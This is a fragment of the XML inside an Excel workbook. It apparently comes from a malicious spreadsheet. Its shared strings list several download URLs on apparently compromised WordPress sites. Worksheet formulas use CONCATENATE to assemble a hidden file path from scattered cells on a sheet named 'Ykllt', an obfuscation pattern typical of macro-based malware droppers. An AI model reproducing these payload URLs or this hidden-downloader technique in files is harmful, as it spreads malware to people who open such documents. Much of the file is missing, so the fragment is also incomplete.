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CIR\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4281D636-A033-4E1E-89CA-7A5522EA2EE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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="20" uniqueCount="20">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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pianistprodigy.com/demolms/Ax6ZgvEJJ8HEKfXrp/","</t>
  </si>
  <si>
    <t>risamfg.com/wp-admin/JtqFQW/","</t>
  </si>
  <si>
    <t>thailand-rocco.com/wp-content/gE7UvFwLh/","</t>
  </si>
  <si>
    <t>pregy.org/test/rXTl1DEv0CWCE/","</t>
  </si>
  <si>
    <t>romusreselling.xyz/wordpress/Lgv7VKTvFFuBH8uct2Eq/","</t>
  </si>
  <si>
    <t>olawyer.net/wp-includes/e8jtEIL3lFkImOvd9k/","</t>
  </si>
  <si>
    <t>tebetdanelon.com.br/wp-content/iVrceXC3knlRRl/","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</si>
</sst>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67" sqref="AM67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sqref="A1:XFD1048576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11" workbookViewId="0">
      <selection activeCell="D14" sqref="D14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C13" sqref="C13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CONCATENATE(Ykllt!P19,Ykllt!P5,Ykllt!P5,Ykllt!P3,Ykllt!F10,Ykllt!D7,Ykllt!C3,Ykllt!B5)</f>
        <v xml:space="preserve"> ..\wnru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CONCATENATE(Ykllt!P5,Ykllt!P5,Ykllt!P3,Ykllt!F10,Ykllt!D7,Ykllt!C3,Ykllt!B5,)</f>
        <v>..\wnru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2022-03-18T12:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>